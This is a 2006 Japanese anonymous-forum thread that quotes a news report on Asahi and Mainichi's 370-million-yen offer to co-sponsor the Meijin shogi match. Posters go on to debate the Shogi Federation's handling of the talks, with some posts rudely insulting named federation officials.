 将棋の名人戦を来年度に始まる予選から共催することで合意した朝日新聞社と毎日新聞社が、
日本将棋連盟に対し、契約金など年間総額3億7000万円を回答していたことが11日、分かった。
 関係者によると、両社の提示額は、名人戦契約金が1社1億7000万円の計3億4000万円で、
ほかに将棋普及協力金を朝日が2000万円、毎日が1000万円支払うという。
この契約金額は現在の毎日単独主催の3億3400万円より600万円アップするものの、
読売新聞社が主催する竜王戦の契約金3億4150万円を下回る。
 一方、連盟が10月に提示した額は、2社同額で1社当たり、名人戦契約金が2億円、
名人戦振興金が3000万円、将棋普及協力金が1億円の計6億6000万円。
金額に開きがあり、連盟側は2社の回答に反発。交渉が続いている。

最終更新:12月12日7時44分
ttp://headlines.yahoo.co.jp/hl?a=20061212-00000501-yom-soci


924 :名無し名人:2006/12/12(火) 15:20:52 ID:VzY2gaFA
( ´_ゝ`)
※め・・

925 :名無し名人:2006/12/12(火) 15:27:09 ID:z6brGTFY
>>922
将棋連盟は単年度赤字は出していたが累積赤字にはなっていない。

926 :名無し名人:2006/12/12(火) 15:48:12 ID:BUdl8vdT
>>892
っ【毎日単独開催】

927 :名無し名人:2006/12/12(火) 15:54:17 ID:YXQoZScL
王将戦を朝日に譲ってもらって、
名人戦若干upぐらいにしとけばよかったのにな。

朝日がしっかり金出してくれるなら
王将戦も名人・竜王にならぶ三大棋戦に育て上げてもいいだろうし。


928 :名無し名人:2006/12/12(火) 16:15:08 ID:+PJk1xfB
芸スポ

【将棋】名人戦連盟の6億6000万円要求に対し、朝日・毎日は3億7000万円回答

http://news18.2ch.net/test/read.cgi/mnewsplus/1165889930/l50

929 :名無し名人:2006/12/12(火) 16:30:46 ID:OkAmzFpJ
朝日は名人戦しか眼中に無かったから
王将戦を引き受けるなんてありえなかっただろうけど

930 :名無し名人:2006/12/12(火) 16:38:24 ID:8vrkf+UD
朝日移管ってのはもともと「発行部数がでかいのでより多くの人に見てもらえる」が理由なんでしょ?米長さん。
二紙で掲載できることになって万々歳のはずなのに、金額が少ないからってどうして反発するの?米長さん。

931 :名無し名人:2006/12/12(火) 16:42:49 ID:AirfRwj6
コメは腹切るべきじゃねえの

932 :名無し名人:2006/12/12(火) 16:48:49 ID:AirfRwj6
いまどき将棋に3億7000万でも破格ってことが分からんのか

933 :名無し名人:2006/12/12(火) 17:24:42 ID:BP4MLkOq
さわやか日記には言及なし。
名人戦契約金の3億4000万は竜王を越えない為にこんなもんだと思う。
問題は、 将棋普及協力金が3000万と大幅減額になったことと、
王将とオープンについて何も触れられていないことだ。
共催になるとかえって減収になると言われてはいたが、これは惨い。

934 :名無し名人:2006/12/12(火) 17:28:47 ID:x4m2TOOA
これって新聞三社の談合によるシナリオ通りの展開って
やつなんじゃないの?

毎日は名人戦を今までの半額程度で維持できる。
朝日は名人戦を格安で手に入れられる。朝日オープン無くせば
名人戦の負担も減る。
読売は竜王戦の賞金額を超えないように三社で談合。
それぞれの思惑が一致したって事。

連盟が実は踊らされてたんだったりして。



935 :名無し名人:2006/12/12(火) 17:36:07 ID:c6PoIgZQ
大新聞の文化部は仲がいいって言うからな(東西新聞と帝都新聞は例外)

936 :名無し名人:2006/12/12(火) 17:41:31 ID:oAmoQJMm
たかだか微々たる金額UPのために、
こんだけの騒動起こして、
理事会はやっぱりアホの集まりということが証明されたなw

937 :名無し名人:2006/12/12(火) 17:46:33 ID:zjrMg/vu
バカだなぁ、新聞社を天秤に掛けてバカにしてるからこんな目に遭うんだよ
大体スポンサーっていうのは自分達より立場が上なのが分かってない
自業自得だね

938 :名無し名人:2006/12/12(火) 17:57:59 ID:hHFOWQAO
結局、将来の棋戦削減(王将、朝日オープン)に先鞭はつけるは、名人戦のスポンサー1社への価値を落とすわで連盟ふんだりけったり。

従来と同じことやるだけで2社だから倍額もらおうという、その発想が頭にお花畑が咲いてる人間の感覚。朝日毎日が合計で同様の額にしようとするのは当たり前ってもんじゃないのか。


939 :名無し名人:2006/12/12(火) 18:06:29 ID:refumxRj
金欲しさに名人位を貶め、序列1位の竜王戦を創ったのは連盟。

両新聞とも棋戦を持っているので、
交渉に何年かけてもかまわない。

頭越しの社長への契約催促の手紙が敗着。
担当が怒り心頭にw

940 :名無し名人:2006/12/12(火) 18:15:07 ID:AirfRwj6
執行部総退陣もんだろこれ

941 :名無し名人:2006/12/12(火) 18:18:18 ID:BP4MLkOq
>>940
8億要求と同じであくまで要求だろうけど、
これほど差が大きいと年内にはまとまらず、
理事選に突っ込んでしまうかもしれないね

942 :名無し名人:2006/12/12(火) 18:27:31 ID:BUdl8vdT
>>939
> 頭越しの社長への契約催促の手紙が敗着。

↑なにこれ?www

こんなの送ったの?

943 :名無し名人:2006/12/12(火) 18:30:42 ID:3VKYRSWi

将棋指しふぜいが調子にのるからだよ




944 :名無し名人:2006/12/12(火) 18:36:15 ID:oAmoQJMm
※は年内決着っていってたけど、全然無理じゃん。
いつまでかかってんだよ。問題おきたの3月末だろ、
で今もう年末だぞ。しかも年越し濃厚てアホすぎる。
どんだけイメージダウンさせてんだよ、とっとと責任とって辞めろよ。
所詮キチ外に経営は無理w

945 :名無し名人:2006/12/12(火) 18:39:47 ID:AirfRwj6
新聞社「共催なら負担が半分になるね」

連盟理事「共催ならお金倍出せるよね」←

946 :名無し名人:2006/12/12(火) 18:40:33 ID:2ZGBEZ1c
>>941
でも、連盟にはもう交渉カード残ってないと思うんだが
それこそ理事会総出で朝日毎日両者に土下座するくらいしか

947 :名無し名人:2006/12/12(火) 18:43:18 ID:refumxRj
>>942
http://hobby.nikkei.co.jp/shogi/news/index.cfm?i=2006110810723s1
連盟は8日、契約交渉を促す文書を両社社長に送付した。

一方的な契約破棄の文書送付に始まり
社長への直訴という最悪の手段。

アルバイトでもして世の中の常識を身に付けないと

948 :名無し名人:2006/12/12(火) 18:44:31 ID:BUdl8vdT
>>946
土下座するなら毎日一社で良い。

若手タイトルホルダーとその支持者が毎日に単独開催を再度懇願すれば大逆転はある。
もちろん、リストラは避けられないだろう。

朝日オープン?なにそれ?

949 :名無し名人:2006/12/12(火) 18:45:25 ID:BUdl8vdT
>>947
これはひどいwwwwwwwwwwwww

950 :名無し名人:2006/12/12(火) 18:48:03 ID:qdqz+E0z
名人戦の商品価値上げたいなら、もっと順位戦の風通しを良くしないとダメだ。

951 :名無し名人:2006/12/12(火) 18:50:50 ID:gxw/4an5
両社担当がこの数カ月、敢えて全く動かないで話を進めず、連盟の悪手を誘い出したのは容易に想像がつく。
汚い交渉術だとは思うが、引っ掛かる方が悪いな。

952 :名無し名人:2006/12/12(火) 18:54:46 ID:AirfRwj6
連盟には外部の大人のアドバイザーとかいないの?

953 :名無し名人:2006/12/12(火) 18:55:31 ID:J1QTqhK1
毎日が共催案を言ってきたときに
「ほれ見ろ、毎日が将棋を切れるわけがない。情けねえな」
とか勝ち誇ってたやつらはどう思ってるんだろうか

一時の駒損をしても好手を繰り出した毎日を上回る好手ってあるの?

954 :名無し名人:2006/12/12(火) 18:56:24 ID:pK2xtjza
普及協力金なんてものは新聞社の気持ちから出すもので、本来筋違い。
それに過大な期待をかける連盟はこれまで通り乞食並みの品性。南口並み。

しかも上のほうでも書いたが、連盟の「口は出すな」という閉鎖体質はひどすぎて、
新聞社ももうもてあまし気味だろう。

田中寅はまたなんか言えよwwww
これから将棋世界は毎月、赤い表紙の名人戦特集か?wwww
おたく共産党かなんか?

955 :名無し名人:2006/12/12(火) 19:01:45 ID:2ZGBEZ1c
>>952
経営諮問委員会というものがあるはずだが…
もともとそこが朝日に話をつけたんじゃなかったか

956 :名無し名人:2006/12/12(火) 19:02:19 ID:BUdl8vdT
連盟はC1以下の棋士を、安定した企業に、
中途採用で正社員として押し込むこと考えたほうがいいんじゃねえの?

予選はできるかぎり土・日・祝日に開催。
大事な手合の日は会社休むことに目をつぶってくれる会社も世の中にはあるだろ?

企業内部で将棋の講義・指導も需要がないわけじゃない。

瀬川はすでにその布石かもしれんけど。

957 :名無し名人:2006/12/12(火) 19:02:31 ID:J1QTqhK1
ttp://www.ninomiyasports.com/xoops/modules/news/article.php?item_id=6179

田中寅彦、笑えるwwwwwwwwwwwww
お前が失礼なこと言うからwwwwwwwwwww

958 :名無し名人:2006/12/12(火) 19:04:16 ID:pK2xtjza
それから、上流から下流まで、自称将棋ファンの方々は、気をつけたほうがいいね〜
とにかく金をせびられるよ〜

チャネラーは騙されないが、呉服屋や株屋や外食屋とかにはこれからもばんばん請求書届くよ〜wwww

959 :名無し名人:2006/12/12(火) 19:04:42 ID:J1QTqhK1
ttp://www.ninomiyasports.com/xoops/modules/news/index.php?storytopic=156

こっちならvol.1から読める

960 :名無し名人:2006/12/12(火) 19:05:08 ID:vfBuRylM
はじめから毎日と朝日が談合していて連盟は騙されたのだろう。
いいように踊らされちゃったね。

961 :名無し名人:2006/12/12(火) 19:07:25 ID:J1QTqhK1
毎日と手を切りたかったのは金の問題じゃなくて部数の問題なんでしょ
よかったじゃん、今までと同じ額を貰えて部数は毎日+朝日になったんだからw

962 :名無し名人:2006/12/12(火) 19:08:43 ID:pK2xtjza
>>957
そう、俺が交渉担当者なら、田中寅の首は絶対取るね、差し出させるね。
自分勝手な理屈でベラベラしゃべったこいつだけは絶対に許さない。

まあ、米も中原も西村も島も交渉相手としては論外だけどね。

963 :名無し名人:2006/12/12(火) 19:10:55 ID:+PJk1xfB
>>953
毎日は単独開催にこだわってたのに結局共催するハメになったじゃん。
負担を軽減することに成功しても、敗者だよ。


964 :名無し名人:2006/12/12(火) 19:11:54 ID:zWBtDklP
田中: 
でも、内情をあまり知らない毎日の社員がやってきて、
「恩義」とか「信義」とか言うだけ。ある棋士は頭にきたので、
自宅に押し掛けた記者に対して、
「こんなところまで来るぐらいなら、部数を増やすために歩いて回れ!」
と説教したらしい(笑)。

何様だよ

965 :名無し名人:2006/12/12(火) 19:13:26 ID:zWBtDklP
>>963
共催だろうが名人戦の主催社として名前を残し、今までの半額で済むんだから十分すぎるほど勝ちだろ

966 :名無し名人:2006/12/12(火) 19:16:07 ID:BUdl8vdT
>>965
結果的にはそう。毎日にとって悪くない結論。
ただ毎日としては多少出費が増えても、単独開催を維持するのが満額回答。

だから、連盟ももう一度毎日に乗り換えるという手がまだ存在する。
どっちみち現理事会メンバーとゴミプロはあぼーんだけどね。

967 :名無し名人:2006/12/12(火) 19:19:28 ID:uy7ofSLR
中原みたいなのが交渉担当してる時点で終わってるだろ
一般社会でだれが敬意をもって接するというんだ

968 :名無し名人:2006/12/12(火) 19:19:36 ID:zWBtDklP
>>966
>連盟ももう一度毎日に乗り換えるという手がまだ存在する。

これは難しいんじゃない?
常務理事とやらがこんなことまで好き勝手に言ったのを
首切ったところで撤回なんてできないよ

田中: 
毎日が将棋連盟の経営を批判するなら、
自社の経営状態や発行部数のことも書いてほしい。何にも書かないじゃないですか。
毎日の部数が少なくなったことが問題の発端にあることにはほっかむりしている。

969 :名無し名人:2006/12/12(火) 19:19:51 ID:BUdl8vdT
>>964
タナトラ( ゚Д゚)イッテヨシ

970 :名無し名人:2006/12/12(火) 19:21:24 ID:+PJk1xfB
>>965
だったらさいしょっから共催するよう働きかけりゃよかったじゃん。
棋士総会の票決に破れた時点で毎日の敗北は確定したんだよ。

971 :名無し名人:2006/12/12(火) 19:21:25 ID:BUdl8vdT
>>968
それは普通に可能。

企業でも取締役会・株主総会でクーデターが成功して、
会社の方針が180度変わることなんてまま起きること。

972 :名無し名人:2006/12/12(火) 19:24:35 ID:q1DlYiLG
本来なら
朝日単独でも5億以上もらえてたところを、
わざわざ毎日の顔も立ててあげたんだから、6億以上貰っても全然正当でしょ。

973 :名無し名人:2006/12/12(火) 19:25:29 ID:3HaYya0a
タナトラの言わんとしてることは
「金の問題ではなく毎日の部数が少なくて普及のためにならない」
ってことでしょ
この大義名分を唱えておきながら今更毎日単独なんてのは無理
朝日単独ならまだしも

974 :名無し名人:2006/12/12(火) 19:27:50 ID:R39ISAFh
連盟はじまったな

975 :名無し名人:2006/12/12(火) 19:29:36 ID:2ZGBEZ1c
部数もそうだが、もっと露骨に「毎日は早晩金を払えなくなる可能性がある」みたいなこと
将棋世界の特集で書いてたやん

976 :名無し名人:2006/12/12(火) 19:29:57 ID:3HaYya0a
>>972
何が当然かわからん

ケーキ屋が「このケーキは丹精込めて作ったから100万円で売ってあげます」
と言ったって俺は買わない

価格ってのは売る側と買う側の折り合いで決まる
買う側が高いと思えば買わないってだけの話

将棋の場合、売買が成立しなくて困るのはどっちか?
・将棋欄がなくてもなくならない新聞
・将棋欄に載せてもらえなければ組織の存続は無理な将棋連盟
どっちが優位に立ってるかは言わずもがな

977 :名無し名人:2006/12/12(火) 19:30:42 ID:BUdl8vdT
>>968
> 田中: 
> 毎日が将棋連盟の経営を批判するなら、
> 自社の経営状態や発行部数のことも書いてほしい。何にも書かないじゃないですか。
> 毎日の部数が少なくなったことが問題の発端にあることにはほっかむりしている。

毎日は将棋連盟に金を出して欲しいと言っているわけではないから、別に公開する筋合いはない。
毎日が将棋連盟に金を出そうと言っているわけだから。

金を出そうと言う人間に「おたくの財布の中身見せてください。」と聞くというのは、はっきり言って常識外(笑)。
頭オカシイ。

もちろん、経営状態はともかく発行部数を理由に朝日と毎日がほぼ同じ条件なら、
朝日を選ぶという判断はあってもいい。

ただ、それによって王将戦が廃止されたり、
毎日と関係がなにかにつけて疎遠になる(連載記事・イベントの依頼など)、というリスクは負わなければならない。

978 :名無し名人:2006/12/12(火) 19:32:39 ID:BUdl8vdT
>>972
それなら今からでも朝日単独にすればいいんだよ。
無問題。

979 :名無し名人:2006/12/12(火) 19:34:15 ID:zjrMg/vu
それは今回は朝日と毎日と読売の利害が一致したからもう無理ぽ。

980 :名無し名人:2006/12/12(火) 19:35:47 ID:8OUHvfmA
>>968
>毎日の部数が少なくなったことが問題の発端にあることにはほっかむりしている。

すげえな・・・
スポンサードしてもらってるという気持ちはないんだろうな


981 :名無し名人:2006/12/12(火) 19:36:28 ID:BUdl8vdT
>>979
毎日も朝日もまだ単独開催は捨ててないと思うよ。
もちろん、毎日に乗り換える場合は理事総辞職クラスのカードを切る必要があるけどね。

982 :名無し名人:2006/12/12(火) 19:36:47 ID:IiUrmVN7
理事会が激怒しても何も対抗手段はないんじゃないか。若干、提示額にイロがつく程度だろう。
泣きつけるようなところはどこにもない。
名人戦1年延期とかいうことが出来る財政状態じゃないんだろうし。


983 :名無し名人:2006/12/12(火) 19:38:10 ID:j1P+c5Uc
祇園精舎の鐘の声、諸行無常の響きあり。
紗羅双樹の花の色、盛者必衰の理をあらわす。
奢れる人久しからず、唯春の夜の夢のごとし。
猛き者も遂には亡びぬ。
偏に風の前の塵に同じ。
         − 歴史は繰り返される −

984 :名無し名人:2006/12/12(火) 19:39:24 ID:pK2xtjza
誰か田中寅のスレ立ててくれwww

【毎日批判】田中寅彦九段【谷川批判】

テンプレ:
交渉のさなかに二宮のHPwで毎日新聞批判連発!!
もっともらしい口調でしゃべればしゃべるほど「棋士の非常識さ」が露呈。
過去には谷川を「あの程度で名人か」と批判。

高柳門下。兄弟子に「将棋脳」「庭先記者会見」の中原永世十段。
「居飛車穴熊」「無理矢理矢倉」など戦法面での貢献もあり。

985 :名無し名人:2006/12/12(火) 19:40:06 ID:3HaYya0a
今度は将棋連盟側が
思いっきり否定してしまった「恩義」とか「信義」とかを持ち出して
なんとか契約金を上げてくださいってお願いに馳せ参じなきゃならないだろうな

986 :名無し名人:2006/12/12(火) 19:42:15 ID:3HaYya0a
収入は、ピーク時が33億円で、今は27億円。

これを毎日のせいにするなよw

987 :名無し名人:2006/12/12(火) 19:43:15 ID:q1DlYiLG
毎日は何がしたいんだ?名前を残したいんなら、それなりの額は出さなきゃならんだろ。
義理だの何だの言っても結局連盟に損させる提案はありえない。
連盟が朝日単独5億を折れるのに申し訳なくないくらいのことはしろよ・・・

988 :名無し名人:2006/12/12(火) 19:44:46 ID:BUdl8vdT
朝日オープン・王将戦クラスの棋戦なら、
大手携帯三社はもちろん、楽天クラスでも運営は十分可能(ペイできる)だろうから、
もし契約が結べれば、朝日(毎日)が撤退しても連盟の経営上は一時的には問題ないはずだが。
~~~~~~~~~~~~~~~~~~~~
普及の面では、全国紙から棋戦連載が消えるかもしれないという問題は残るけれども。

989 :名無し名人:2006/12/12(火) 19:45:40 ID:AirfRwj6
連盟の無謀な高飛車戦法には新聞社一同苦笑しております

990 :名無し名人:2006/12/12(火) 19:45:40 ID:BUdl8vdT

ID:q1DlYiLG=将棋脳(笑)

991 :名無し名人:2006/12/12(火) 19:47:47 ID:3HaYya0a
>>987
連盟が最初から共催なんて認めなきゃよかっただけの話

992 :名無し名人:2006/12/12(火) 19:50:00 ID:3HaYya0a
「共催になったら契約金が倍とは言わないまでもかなり取れるんじゃね?」
「おー、すごい名案ですね、会長」
「それで行きましょう」

結果、2社で金額は今までと変わらず

教訓、自業自得

993 :名無し名人:2006/12/12(火) 19:50:05 ID:nZZanRvE

松坂代理人ボラス氏、に交渉を委任。
素人の棋士には難しい事は無理・、




994 :名無し名人:2006/12/12(火) 19:50:46 ID:q1DlYiLG
>>991
「お金のことはちゃんと考えてますんで」とか言って連盟に共催を認めて貰ったんじゃないの。
で、正当にことが決まってからゴネても・・・

995 :名無し名人:2006/12/12(火) 19:52:27 ID:q1DlYiLG
連盟にとっちゃ共催なんてどうでもいいんだよ。顔をたてて便宜を図ってやったってこと。
その見返りもまた当然。

996 :名無し名人:2006/12/12(火) 19:55:10 ID:trulF6gm
>>988
ペイできるわけなかろうが。契約金が一桁違っても無理だよ。

997 :名無し名人:2006/12/12(火) 19:56:37 ID:bWBU3guY
1000なら藤井名人

998 :名無し名人:2006/12/12(火) 19:57:16 ID:BUdl8vdT
>>996
なんで?Eトレード証券とヤフーとソフトバンクで共催とか普通にあると思うが。

999 :名無し名人:2006/12/12(火) 19:57:43 ID:PSCXh51X
1000なら藤丼名人

1000 :名無し名人:2006/12/12(火) 19:58:00 ID:bWBU3guY
1000なら藤井名人

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

308 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)